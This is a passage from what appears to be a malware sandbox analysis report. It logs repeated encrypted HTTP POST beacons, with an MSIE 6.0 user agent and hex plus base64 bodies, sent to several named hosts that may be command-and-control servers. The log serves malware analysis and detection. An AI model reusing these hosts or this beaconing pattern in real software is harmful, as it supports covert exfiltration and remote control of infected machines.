76 31 37 2b 56 6f 6b 78 31 69 71 73 52 7a 78 35 39 6d 6d 62 55 56 4f 57 68 63 47 44 59 47 73 45 6a 79 49 5a 6f 70 41 46 70 72 65 35 30 42 6b 75 57 59 37 34 76 6e 77 76 75 2b 59 61 72 2b 35 56 43 37 33 74 6d 7a 52 78 69 4a 37 56 51 5a 6d 70 58 47 66 65 69 6a 4c 36 32 79 34 61 65 6e 4f 62 6e 6b 4b 31 51 66 51 67 4f 48 39 4f 36 2b 5a 52 46 36 6d 71 69 63 62 78 66 36 55 6b 50 4e 75 62 32 45 61 34 4c 39 76 6c 78 36 50 52 63 35 70 70 4a 54 51 32 35 36 38 4c 75 68 53 30 52 73 2b 68 50 54 4c 71 65 6d 5a 38 70 6c 70 47 63 42 56 61 48 34 57 74 54 44 55 6e 79 62 6b 31 46 6b 2f 33 63 50 38 76 62 31 6b 41 68 6d 6e 78 58 63 53 79 6e 42 43 4a 54 37 32 51 36 6c 64 51 68 79 41 37 7a 64 34 69 48 75 78 30 4e 71 62 67 41 5a 5a 2b 5a 6a 2b 6b 2f 4d 73 79 75 50 33 2b 33 4c 5a 4c 48 6d 6e 39 53 57 63 70 72 43 47 35 72 41 4e 36 79 31 43 34 6b 67 77 41 2f 6f 71 78 67 58 64 64 5a 38 49 6f 70 32 4a 68 41 63 2f 64 74 74 67 32 30 56 4e 4a 4d 66 31 52 66 2b 64 71 57 45 56 31 53 31 31 6c 6c 71 66 5a 46 2b 39 4d 41 41 3d 3d Data Ascii: Jxl7yF3qN9D4b3sOlOi7+ZZOy3MLaQWZ4VgTGlAN85rHsisKTuKQtRb6jUzXmWMs860IOKvD50H1tokNibVP98cryPa9CngYGLAssl88ynoH8Tl7KbCuu420hscETgc4csCNZ4M7lGM3KLSCM3ysYnoY9w2rlZf6XVj+jpZJIeMgXJr012dx5PUBgRmubBtZTNxPeC0NbNDiv4SZnTOLr+vSrBsCYNw3tJHpoTPFv17+Vokx1iqsRzx59mmbUVOWhcGDYGsEjyIZopAFpre50BkuWY74vnwvu+Yar+5VC73tmzRxiJ7VQZmpXGfeijL62y4aenObnkK1QfQgOH9O6+ZRF6mqicbxf6UkPNub2Ea4L9vlx6PRc5ppJTQ2568LuhS0Rs+hPTLqemZ8plpGcBVaH4WtTDUnybk1Fk/3cP8vb1kAhmnxXcSynBCJT72Q6ldQhyA7zd4iHux0NqbgAZZ+Zj+k/MsyuP3+3LZLHmn9SWcprCG5rAN6y1C4kgwA/oqxgXddZ8Iop2JhAc/dttg20VNJMf1Rf+dqWEV1S11llqfZF+9MAA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 33 37 4f 65 79 49 48 72 4e 39 43 4d 70 77 74 30 59 45 36 30 46 6c 72 2f 46 50 44 2f 65 6c 57 49 52 62 6f 67 36 63 65 6b 70 4c 52 6e 38 4f 56 6f 35 50 63 62 58 67 6a 35 31 69 52 4e 2f 67 4b 61 52 69 62 6f 61 79 6d 68 55 7a 64 61 43 38 53 63 65 51 56 78 31 71 67 75 64 4b 43 2f 75 72 64 6c 70 66 63 61 74 76 6e 55 5a 6c 46 72 6c 41 66 4d 7a 30 59 71 54 6e 6a 53 5a 64 52 48 45 43 43 39 38 6a 64 57 43 4b 78 55 44 44 63 37 38 63 6b 6f 37 67 2b 54 4b 61 44 5a 73 55 59 77 51 38 50 56 54 4a 32 43 41 64 64 70 48 46 54 6f 5a 42 34 66 4f 4c 2f 52 53 34 43 69 72 6d 4a 48 45 69 54 65 39 72 44 65 36 78 35 41 52 54 68 72 33 62 55 5a 43 6c 59 7a 6a 76 6a 2f 32 71 4c 75 5a 57 54 69 59 31 42 39 51 62 36 64 57 44 6d 49 5a 64 63 55 4a 45 4b 2b 77 6c 50 45 6c 6b 30 34 78 53 37 56 64 54 45 5a 52 5a 37 74 78 4a 67 49 50 7a 56 62 73 58 52 31 51 7a 48 66 6d 52 32 33 4f 54 49 67 64 49 44 57 37 75 33 42 62 6e 4b 4c 68 6d 4c 59 59 71 69 56 37 73 31 4f 37 69 50 41 6b 4c 64 53 71 54 34 6b 32 47 75 77 30 30 5a 71 63 6e 78 56 64 56 34 64 67 64 4c 4a 46 63 45 73 6a 54 50 74 44 4f 77 6d 61 31 4a 5a 44 76 56 7a 5a 35 68 42 32 39 4f 54 76 79 72 4c 67 50 4f 6d 56 73 78 6a 39 50 4e 32 41 50 48 45 4c 7a 38 50 56 44 76 71 78 76 78 6d 37 54 4d 73 6a 4e 53 61 4d 38 7a 54 68 68 2b 4d 58 6c 44 79 2f 51 70 67 33 58 42 55 58 69 62 47 6f 6f 76 70 4f 6e 33 6f 61 67 63 47 69 36 2f 61 31 7a 51 65 6e 47 2b 6b 55 6f 6c 44 47 46 6d 35 36 6e 30 51 43 39 55 4a 67 30 67 78 5a 54 58 6b 34 67 41 71 47 2f 68 43 46 6d 2f 76 65 67 2f 6e 43 30 69 7a 6b 41 4f 42 44 36 4f 37 56 39 2f 38 65 79 4c 6f 33 6a 45 7a 69 58 4c 46 39 74 72 6a 7a 4c 6e 2f 67 50 55 70 6b 42 33 70 72 39 4f 66 68 6f 43 2b 66 34 49 52 44 70 2b 37 53 74 74 62 Data Ascii: 37OeyIHrN9CMpwt0YE60Flr/FPD/elWIRbog6cekpLRn8OVo5PcbXgj51iRN/gKaRiboaymhUzdaC8SceQVx1qgudKC/urdlpfcatvnUZlFrlAfMz0YqTnjSZdRHECC98jdWCKxUDDc78cko7g+TKaDZsUYwQ8PVTJ2CAddpHFToZB4fOL/RS4CirmJHEiTe9rDe6x5ARThr3bUZClYzjvj/2qLuZWTiY1B9Qb6dWDmIZdcUJEK+wlPElk04xS7VdTEZRZ7txJgIPzVbsXR1QzHfmR23OTIgdIDW7u3BbnKLhmLYYqiV7s1O7iPAkLdSqT4k2Guw00ZqcnxVdV4dgdLJFcEsjTPtDOwma1JZDvVzZ5hB29OTvyrLgPOmVsxj9PN2APHELz8PVDvqxvxm7TMsjNSaM8zThh+MXlDy/Qpg3XBUXibGoovpOn3oagcGi6/a1zQenG+kUolDGFm56n0QC9UJg0gxZTXk4gAqG/hCFm/veg/nC0izkAOBD6O7V9/8eyLo3jEziXLF9trjzLn/gPUpkB3pr9OfhoC+f4IRDp+7Sttb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 74 68 66 43 46 79 63 74 4d 74 41 52 2f 6f 78 62 31 73 6a 48 4e 66 44 35 4d 53 4b 64 72 4f 4e 39 53 37 4f 53 6c 50 4e 76 51 49 4c 37 78 47 76 64 48 74 69 55 63 45 4e 37 34 6a 6a 34 6c 6e 31 33 4b 59 5a 74 6c 45 5a 65 49 50 31 52 4f 6b 38 34 57 74 6d 61 75 2f 2f 7a 52 71 43 55 4c 6b 4c 37 33 67 46 52 72 71 73 36 31 71 50 76 52 69 4c 6c 55 4a 70 6b 6a 59 59 34 57 64 6c 6e 59 69 65 76 39 52 56 78 43 4a 78 58 4e 2b 62 64 38 4d 31 4a 4a 70 57 38 42 74 4f 63 44 51 31 55 50 45 48 56 53 65 34 4c 57 42 65 45 52 4c 46 54 33 42 71 49 5a 4f 41 63 52 6c 50 64 49 4e 46 63 77 31 5a 69 4d 59 48 73 54 75 4f 6a 63 39 34 56 2f 6b 6a 4b 4b 34 4e 45 43 58 53 73 7a 68 4e 2f 6f 43 50 66 6b 57 4c 42 44 39 77 67 75 44 58 4e 4f 6b 77 43 45 6d 76 6c 63 55 62 49 66 44 39 4c 45 54 6c 31 2b 42 31 53 53 59 31 44 50 73 4c 66 72 46 43 4f 4e 31 57 32 75 7a 41 66 64 75 4b 72 47 65 48 4a 64 54 50 56 69 2b 68 4c 41 47 34 76 4b 76 2b 6a 54 65 49 74 33 7a 31 30 51 4e 61 54 65 56 68 68 73 76 76 78 4a 49 4d 5a 63 36 50 55 77 6d 50 4f 75 34 67 68 6d 71 53 70 55 43 6b 2b 51 32 4e 70 47 4b 66 4c 6d 7a 64 6f 50 59 36 57 71 74 32 74 7a 4a 62 55 4a 46 4a 35 35 58 66 58 79 36 38 49 71 71 66 50 43 35 73 77 76 55 79 56 78 58 4d 46 6e 34 38 6e 6a 7a 39 74 61 30 55 74 42 6a 78 68 36 50 47 7a 59 38 54 61 7a 71 79 46 61 6c 6d 4f 65 6e 78 79 4c 6e 2b 4c 35 53 45 72 38 48 75 4d 62 43 45 74 77 37 59 30 44 59 69 54 71 74 70 6f 38 4d 73 79 77 42 4e 57 4f 63 42 6d 57 79 48 76 59 67 55 6f 35 2f 75 66 61 45 52 6b 68 63 43 6b 56 57 69 4a 38 4c 61 75 34 65 69 4c 4e 6c 36 73 65 7a 53 62 7a 67 42 76 4d 46 62 61 68 63 55 62 76 34 78 47 6e 6d 4b 56 50 45 70 35 59 67 3d 3d Data Ascii: thfCFyctMtAR/oxb1sjHNfD5MSKdrON9S7OSlPNvQIL7xGvdHtiUcEN74jj4ln13KYZtlEZeIP1ROk84Wtmau//zRqCULkL73gFRrqs61qPvRiLlUJpkjYY4WdlnYiev9RVxCJxXN+bd8M1JJpW8BtOcDQ1UPEHVSe4LWBeERLFT3BqIZOAcRlPdINFcw1ZiMYHsTuOjc94V/kjKK4NECXSszhN/oCPfkWLBD9wguDXNOkwCEmvlcUbIfD9LETl1+B1SSY1DPsLfrFCON1W2uzAfduKrGeHJdTPVi+hLAG4vKv+jTeIt3z10QNaTeVhhsvvxJIMZc6PUwmPOu4ghmqSpUCk+Q2NpGKfLmzdoPY6Wqt2tzJbUJFJ55XfXy68IqqfPC5swvUyVxXMFn48njz9ta0UtBjxh6PGzY8TazqyFalmOenxyLn+L5SEr8HuMbCEtw7Y0DYiTqtpo8MsywBNWOcBmWyHvYgUo5/ufaERkhcCkVWiJ8Lau4eiLNl6sezSbzgBvMFbahcUbv4xGnmKVPEp5Yg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 39 36 71 30 7a 63 73 56 4f 4e 41 49 36 47 59 35 49 76 44 4a 53 44 53 43 6b 2b 55 52 2f 43 34 76 4c 33 78 61 70 6b 36 46 57 73 4f 34 73 64 6e 4c 32 74 6a 68 65 79 47 71 62 4c 78 62 4c 55 56 58 62 38 32 42 52 55 61 34 4b 4d 72 38 35 6a 72 44 33 6c 4c 47 6f 2b 51 32 39 64 58 64 58 7a 62 4e 7a 41 35 6b 7a 64 4a 48 32 41 69 42 57 55 57 32 42 38 39 54 47 38 71 44 61 73 4c 35 73 51 69 48 32 7a 70 79 53 32 79 54 79 31 44 4d 50 61 48 52 48 4b 54 31 57 70 53 75 45 2f 75 2f 42 6e 57 62 33 39 30 33 70 52 45 47 61 6f 59 32 39 59 62 78 6b 37 70 6f 65 53 33 6f 42 58 70 48 33 67 53 55 45 56 77 33 55 2f 37 48 53 48 4b 57 58 38 4d 39 34 64 58 49 66 74 78 4d 55 51 59 74 69 6a 72 77 42 36 61 78 55 75 4c 34 57 36 4b 65 42 53 59 66 46 31 4b 4d 46 66 41 4e 54 33 32 4d 78 43 35 78 7a 56 74 6e 79 72 4a 4d 41 57 33 4f 65 36 43 49 43 2f 79 37 47 71 56 78 4c 58 67 35 4d 6e 48 7a 37 65 64 47 75 5a 32 32 5a 47 6b 44 34 79 35 4c 6e 59 6d 45 66 30 43 76 58 65 31 41 77 33 4f 79 70 72 59 66 48 52 51 78 66 6b 70 59 50 64 61 78 62 63 50 56 48 59 32 4f 35 2f 4d 4d 78 79 55 33 41 64 33 79 4d 44 6f 4a 67 45 52 7a 33 2f 47 6b 41 4c 79 30 2b 6d 32 49 48 42 50 4d 6e 58 46 39 6d 65 72 53 58 77 41 65 78 6f 44 78 4c 72 72 62 50 4a 44 6d 61 76 6e 4d 77 61 58 31 57 6e 6d 49 68 42 74 7a 32 4a 39 50 57 67 79 5a 74 6e 55 2b 49 50 43 4b 38 64 48 77 52 37 53 41 41 4f 42 2b 45 63 61 76 41 6d 34 6b 41 68 75 30 59 4f 57 68 6f 58 5a 36 6c 6a 51 49 63 6c 47 6c 4b 59 63 4c 51 44 70 47 64 46 71 4a 56 71 46 58 2f 2b 75 36 6d 55 79 36 33 63 41 5a 49 79 57 30 5a 6a 55 6b 79 4b 4a 35 49 2b 67 78 59 74 63 62 52 64 59 67 Data Ascii: 96q0zcsVONAI6GY5IvDJSDSCk+UR/C4vL3xapk6FWsO4sdnL2tjheyGqbLxbLUVXb82BRUa4KMr85jrD3lLGo+Q29dXdXzbNzA5kzdJH2AiBWUW2B89TG8qDasL5sQiH2zpyS2yTy1DMPaHRHKT1WpSuE/u/BnWb3903pREGaoY29Ybxk7poeS3oBXpH3gSUEVw3U/7HSHKWX8M94dXIftxMUQYtijrwB6axUuL4W6KeBSYfF1KMFfANT32MxC5xzVtnyrJMAW3Oe6CIC/y7GqVxLXg5MnHz7edGuZ22ZGkD4y5LnYmEf0CvXe1Aw3OyprYfHRQxfkpYPdaxbcPVHY2O5/MMxyU3Ad3yMDoJgERz3/GkALy0+m2IHBPMnXF9merSXwAexoDxLrrbPJDmavnMwaX1WnmIhBtz2J9PWgyZtnU+IPCK8dHwR7SAAOB+EcavAm4kAhu0YOWhoXZ6ljQIclGlKYcLQDpGdFqJVqFX/+u6mUy63cAZIyW0ZjUkyKJ5I+gxYtcbRdYg
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 73 62 57 54 7a 62 6b 55 4f 4e 42 65 33 4e 48 45 53 4c 61 61 4c 56 4a 52 51 41 75 58 4b 41 47 54 2f 56 72 67 67 61 7a 76 44 6f 61 38 72 2b 5a 64 37 6b 63 63 67 6e 6b 71 6c 30 34 59 37 61 50 73 51 43 71 63 55 66 41 43 4d 2b 50 4d 53 77 64 6d 48 43 52 46 59 6c 58 39 62 63 52 6c 36 62 56 33 4d 59 78 78 46 70 52 2b 64 62 2b 79 42 76 36 54 39 71 66 71 2f 72 57 6b 66 32 61 41 37 6e 79 39 2b 43 37 32 77 7a 37 63 32 5a 46 37 49 4c 34 78 62 70 4b 6e 6c 46 74 6e 55 61 78 42 64 39 7a 64 31 68 33 71 75 45 36 35 59 69 59 6c 4d 78 6a 58 32 56 5a 39 2b 4a 50 38 35 49 35 4a 47 71 67 51 41 47 53 6b 31 43 38 6e 69 38 5a 2f 2f 79 77 45 2b 48 53 73 54 37 37 54 49 72 76 4f 79 55 53 4b 49 59 42 72 47 6e 6b 73 73 76 50 79 48 71 42 4b 77 77 50 39 38 48 6f 62 5a 4b 79 36 36 48 51 34 77 69 74 56 64 6f 42 66 59 70 4b 6d 44 45 63 66 77 54 5a 65 65 43 72 4d 6a 32 58 32 47 70 76 34 30 49 44 44 6e 69 76 58 55 2b 73 52 69 74 32 55 62 49 73 76 61 71 59 71 51 7a 38 74 34 61 4f 6a 33 76 63 65 71 4b 2f 58 7a 7a 47 61 77 76 36 75 7a 67 4f 48 2f 57 38 49 2b 46 70 45 45 43 33 57 53 52 58 2f 47 2f 71 49 77 74 77 6c 75 79 70 6d 45 6e 38 4e 57 2f 63 4e 53 74 70 4d 44 56 6d 78 4d 74 7a 66 30 49 31 51 77 37 67 2b 4f 77 6c 51 6a 64 55 37 4d 70 75 4f 79 4c 55 55 76 53 4c 65 6d 62 4b 33 4e 32 35 67 4f 4d 35 37 4e 38 4a 5a 32 4d 45 30 6d 63 37 4f 45 4f 2f 66 58 33 2b 68 6a 7a 64 6b 6a 2b 30 6c 68 42 32 57 72 61 42 31 4d 61 2b 4b 54 64 6e 30 78 6c 2f 35 32 46 47 77 77 67 4a 56 76 63 4d 6a 4d 75 43 4d 55 52 2f 6f 54 4c 34 52 71 4c 67 2b 65 33 46 4f 63 67 56 4b 64 58 56 6e 39 73 63 42 74 54 53 5a 56 62 42 47 61 6e 76 31 64 4e 63 46 38 6a 6c 4d 69 73 65 4b 37 79 70 72 6a 69 52 52 4b 36 52 41 48 65 36 49 50 67 3d 3d Data Ascii: sbWTzbkUONBe3NHESLaaLVJRQAuXKAGT/VrggazvDoa8r+Zd7kccgnkql04Y7aPsQCqcUfACM+PMSwdmHCRFYlX9bcRl6bV3MYxxFpR+db+yBv6T9qfq/rWkf2aA7ny9+C72wz7c2ZF7IL4xbpKnlFtnUaxBd9zd1h3quE65YiYlMxjX2VZ9+JP85I5JGqgQAGSk1C8ni8Z//ywE+HSsT77TIrvOyUSKIYBrGnkssvPyHqBKwwP98HobZKy66HQ4witVdoBfYpKmDEcfwTZeeCrMj2X2Gpv40IDDnivXU+sRit2UbIsvaqYqQz8t4aOj3vceqK/XzzGawv6uzgOH/W8I+FpEEC3WSRX/G/qIwtwluypmEn8NW/cNStpMDVmxMtzf0I1Qw7g+OwlQjdU7MpuOyLUUvSLembK3N25gOM57N8JZ2ME0mc7OEO/fX3+hjzdkj+0lhB2WraB1Ma+KTdn0xl/52FGwwgJVvcMjMuCMUR/oTL4RqLg+e3FOcgVKdXVn9scBtTSZVbBGanv1dNcF8jlMiseK7yprjiRRK6RAHe6IPg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 33 37 4f 65 79 49 48 72 4e 39 43 4d 70 77 74 30 59 45 36 30 46 6c 72 2f 46 50 44 2f 65 6c 57 49 52 62 6f 67 36 63 65 6b 70 4c 52 6e 38 4f 56 6f 35 50 63 62 58 67 6a 35 31 69 52 4e 2f 67 4b 61 52 69 62 6f 61 79 6d 68 55 7a 64 61 43 38 53 63 65 51 56 78 31 71 67 75 64 4b 43 2f 75 72 64 6c 70 66 63 61 74 76 6e 55 5a 6c 46 72 6c 41 66 4d 7a 30 59 71 54 6e 6a 53 5a 64 52 48 45 43 43 39 38 6a 64 57 43 4b 78 55 44 44 63 37 38 63 6b 6f 37 67 2b 54 4b 61 44 5a 73 55 59 77 51 38 50 56 54 4a 32 43 41 64 64 70 48 46 54 6f 5a 42 34 66 4f 4c 2f 52 53 34 43 69 72 6d 4a 48 45 69 54 65 39 72 44 65 36 78 35 41 52 54 68 72 33 62 55 5a 43 6c 59 7a 6a 76 6a 2f 32 71 4c 75 5a 57 54 69 59 31 42 39 51 62 36 64 57 44 6d 49 5a 64 63 55 4a 45 4b 2b 77 6c 50 45 6c 6b 30 34 78 53 37 56 64 54 45 5a 52 5a 37 74 78 4a 67 49 50 7a 56 62 73 58 52 31 51 7a 48 66 6d 52 32 33 4f 54 49 67 64 49 44 57 37 75 33 42 62 6e 4b 4c 68 6d 4c 59 59 71 69 56 37 73 31 4f 37 69 50 41 6b 4c 64 53 71 54 34 6b 32 47 75 77 30 30 5a 71 63 6e 78 56 64 56 34 64 67 64 4c 4a 46 63 45 73 6a 54 50 74 44 4f 77 6d 61 31 4a 5a 44 76 56 7a 5a 35 68 42 32 39 4f 54 76 79 72 4c 67 50 4f 6d 56 73 78 6a 39 50 4e 32 41 50 48 45 4c 7a 38 50 56 44 76 71 78 76 78 6d 37 54 4d 73 6a 4e 53 61 4d 38 7a 54 68 68 2b 4d 58 6c 44 79 2f 51 70 67 33 58 42 55 58 69 62 47 6f 6f 76 70 4f 6e 33 6f 61 67 63 47 69 36 2f 61 31 7a 51 65 6e 47 2b 6b 55 6f 6c 44 47 46 6d 35 36 6e 30 51 43 39 55 4a 67 30 67 78 5a 54 58 6b 34 67 41 71 47 2f 68 43 46 6d 2f 76 65 67 2f 6e 43 30 69 7a 6b 41 4f 42 44 36 4f 37 56 39 2f 38 65 79 4c 6f 33 6a 45 7a 69 58 4c 46 39 74 72 6a 7a 4c 6e 2f 67 50 55 70 6b 42 33 70 72 39 4f 66 68 6f 43 2b 66 34 49 52 44 70 2b 37 53 74 74 62 Data Ascii: 37OeyIHrN9CMpwt0YE60Flr/FPD/elWIRbog6cekpLRn8OVo5PcbXgj51iRN/gKaRiboaymhUzdaC8SceQVx1qgudKC/urdlpfcatvnUZlFrlAfMz0YqTnjSZdRHECC98jdWCKxUDDc78cko7g+TKaDZsUYwQ8PVTJ2CAddpHFToZB4fOL/RS4CirmJHEiTe9rDe6x5ARThr3bUZClYzjvj/2qLuZWTiY1B9Qb6dWDmIZdcUJEK+wlPElk04xS7VdTEZRZ7txJgIPzVbsXR1QzHfmR23OTIgdIDW7u3BbnKLhmLYYqiV7s1O7iPAkLdSqT4k2Guw00ZqcnxVdV4dgdLJFcEsjTPtDOwma1JZDvVzZ5hB29OTvyrLgPOmVsxj9PN2APHELz8PVDvqxvxm7TMsjNSaM8zThh+MXlDy/Qpg3XBUXibGoovpOn3oagcGi6/a1zQenG+kUolDGFm56n0QC9UJg0gxZTXk4gAqG/hCFm/veg/nC0izkAOBD6O7V9/8eyLo3jEziXLF9trjzLn/gPUpkB3pr9OfhoC+f4IRDp+7Sttb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 62 66 42 2f 65 43 38 42 4c 64 42 6c 50 4a 63 6b 54 72 7a 48 32 6a 6a 58 75 6c 78 46 46 58 45 31 30 38 4f 2f 5a 6e 6f 6b 52 72 4c 67 5a 6d 53 63 30 59 76 69 62 31 69 35 4e 76 55 63 54 6c 49 61 37 4c 59 35 73 58 6c 4f 58 58 6f 61 57 34 79 34 73 51 41 72 37 76 38 77 6d 39 59 33 33 58 4b 73 45 4b 46 67 50 37 5a 6a 38 44 58 61 77 5a 61 77 53 70 65 6b 58 32 4b 70 34 65 4d 36 63 64 72 69 52 6f 55 56 6e 35 47 46 70 51 37 6b 42 63 4c 69 78 5a 59 39 68 43 75 4c 73 61 6d 41 64 4d 77 2b 35 31 52 48 43 36 71 5a 79 2f 52 6b 45 2b 4a 72 4c 61 78 47 75 6f 56 4a 69 70 30 65 70 50 44 62 76 46 75 49 58 32 71 76 77 66 65 63 75 70 48 52 73 42 6a 53 4b 31 59 39 52 47 63 61 62 7a 58 39 57 39 5a 69 6c 4f 37 2f 70 38 68 39 2b 6c 2b 66 5a 52 61 52 43 51 51 41 6b 5a 6c 64 42 76 45 4b 45 5a 41 30 74 31 38 6e 39 6f 47 53 2b 56 76 55 70 37 71 6c 4d 76 74 57 62 61 63 45 67 36 43 6f 2b 2b 34 76 6b 73 48 6a 75 59 74 61 66 45 4c 4d 46 54 61 37 72 6d 4a 66 36 54 4e 43 38 63 55 67 58 68 69 6c 2f 38 46 4a 43 4f 35 4d 71 63 50 30 61 79 6f 4e 30 66 63 78 44 50 4f 53 5a 6e 75 64 48 42 5a 4c 77 78 66 30 42 4b 2b 46 59 34 6a 57 2b 5a 4f 6c 57 59 4e 4a 30 37 59 72 5a 66 63 50 7a 53 4f 72 6f 66 70 66 2f 43 43 51 6b 7a 79 36 6f 75 2f 6b 36 4d 59 46 75 51 31 79 78 61 67 6b 41 73 6e 6e 6c 44 43 38 4b 63 50 6a 31 68 65 47 65 37 45 35 6a 4d 61 76 64 56 5a 55 66 4f 75 76 71 2f 4a 33 44 50 4b 2f 53 6b 56 69 39 51 79 5a 61 53 50 46 6e 6b 6a 7a 55 4f 73 46 77 41 75 63 52 77 43 36 44 68 59 42 4f 6d 71 2b 70 35 4f 2b 54 6b 76 37 46 5a 68 70 4b 55 33 53 4c 52 51 70 50 4c 4d 70 38 5a 55 30 51 77 31 68 35 4c 50 62 62 35 43 4a 61 78 6f 3d Data Ascii: bfB/eC8BLdBlPJckTrzH2jjXulxFFXE108O/ZnokRrLgZmSc0Yvib1i5NvUcTlIa7LY5sXlOXXoaW4y4sQAr7v8wm9Y33XKsEKFgP7Zj8DXawZawSpekX2Kp4eM6cdriRoUVn5GFpQ7kBcLixZY9hCuLsamAdMw+51RHC6qZy/RkE+JrLaxGuoVJip0epPDbvFuIX2qvwfecupHRsBjSK1Y9RGcabzX9W9ZilO7/p8h9+l+fZRaRCQQAkZldBvEKEZA0t18n9oGS+VvUp7qlMvtWbacEg6Co++4vksHjuYtafELMFTa7rmJf6TNC8cUgXhil/8FJCO5MqcP0ayoN0fcxDPOSZnudHBZLwxf0BK+FY4jW+ZOlWYNJ07YrZfcPzSOrofpf/CCQkzy6ou/k6MYFuQ1yxagkAsnnlDC8KcPj1heGe7E5jMavdVZUfOuvq/J3DPK/SkVi9QyZaSPFnkjzUOsFwAucRwC6DhYBOmq+p5O+Tkv7FZhpKU3SLRQpPLMp8ZU0Qw1h5LPbb5CJaxo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 6d 4e 6b 4c 6a 74 63 54 48 64 42 62 39 48 61 69 78 70 2f 50 55 79 43 45 71 38 55 4e 67 63 36 32 2b 7a 54 33 74 77 65 56 47 74 6e 74 56 37 5a 58 4e 4a 4f 48 4e 41 46 48 31 67 71 4a 74 43 39 70 78 36 32 6e 36 68 36 4e 68 50 79 52 39 6c 4a 62 46 63 6b 70 6e 41 48 77 57 64 2b 5a 2b 52 33 6a 45 65 49 53 76 74 6d 7a 48 71 4f 62 69 76 51 72 65 69 73 31 32 45 4b 54 61 72 45 43 2b 53 6a 64 73 51 49 55 2f 70 43 72 73 71 73 30 64 67 75 5a 79 6d 53 46 39 30 47 49 73 32 76 41 50 39 69 35 2b 4c 74 6d 65 45 68 7a 77 74 78 68 68 34 2f 72 37 32 57 39 4b 62 75 4a 78 74 7a 62 47 63 4a 58 47 6f 54 67 44 31 34 57 34 4e 75 6f 51 36 69 2b 76 48 7a 77 51 6c 41 36 53 79 6a 70 68 77 51 6a 69 76 61 6c 63 47 68 67 42 2b 49 67 54 30 51 41 6f 57 79 79 63 68 78 7a 56 67 4f 48 4e 4f 54 6a 61 31 48 6a 71 79 38 6c 62 42 51 41 35 70 4c 79 50 55 6c 4b 6f 30 44 2f 6f 68 54 6f 34 76 63 55 4d 32 2b 72 46 4e 78 65 45 46 4a 72 34 41 6a 70 57 37 52 49 49 54 6a 4c 32 4f 51 64 36 79 68 6b 57 48 4d 52 45 62 71 36 47 58 68 4b 36 64 6b 72 52 34 31 36 37 46 4f 53 75 6c 4e 32 52 63 2b 59 67 45 34 78 6c 33 77 79 67 51 38 56 78 48 74 72 77 63 61 50 6c 48 6d 68 63 30 59 34 64 54 33 71 2b 6e 5a 4e 41 52 69 54 37 46 45 30 51 37 44 56 58 38 54 43 67 45 4a 53 6f 37 38 36 7a 66 37 4d 6c 6f 6c 72 53 47 57 66 59 34 4c 61 43 71 66 46 54 6b 42 6d 77 34 75 4c 6d 69 52 57 33 46 38 49 32 36 47 46 45 4b 4a 67 41 66 76 44 79 79 4b 74 30 55 31 73 59 52 6c 32 33 79 55 79 67 70 46 54 45 4b 68 47 57 71 4e 35 48 33 79 6e 41 62 65 39 42 44 32 63 78 44 78 43 42 51 74 42 55 33 67 42 47 41 58 73 56 44 67 50 34 6b 49 43 66 66 45 4b 54 61 4b 4b 43 49 46 6a 35 2b 4e 68 Data Ascii: mNkLjtcTHdBb9Haixp/PUyCEq8UNgc62+zT3tweVGtntV7ZXNJOHNAFH1gqJtC9px62n6h6NhPyR9lJbFckpnAHwWd+Z+R3jEeISvtmzHqObivQreis12EKTarEC+SjdsQIU/pCrsqs0dguZymSF90GIs2vAP9i5+LtmeEhzwtxhh4/r72W9KbuJxtzbGcJXGoTgD14W4NuoQ6i+vHzwQlA6SyjphwQjivalcGhgB+IgT0QAoWyychxzVgOHNOTja1Hjqy8lbBQA5pLyPUlKo0D/ohTo4vcUM2+rFNxeEFJr4AjpW7RIITjL2OQd6yhkWHMREbq6GXhK6dkrR4167FOSulN2Rc+YgE4xl3wygQ8VxHtrwcaPlHmhc0Y4dT3q+nZNARiT7FE0Q7DVX8TCgEJSo786zf7MlolrSGWfY4LaCqfFTkBmw4uLmiRW3F8I26GFEKJgAfvDyyKt0U1sYRl23yUygpFTEKhGWqN5H3ynAbe9BD2cxDxCBQtBU3gBGAXsVDgP4kICffEKTaKKCIFj5+Nh
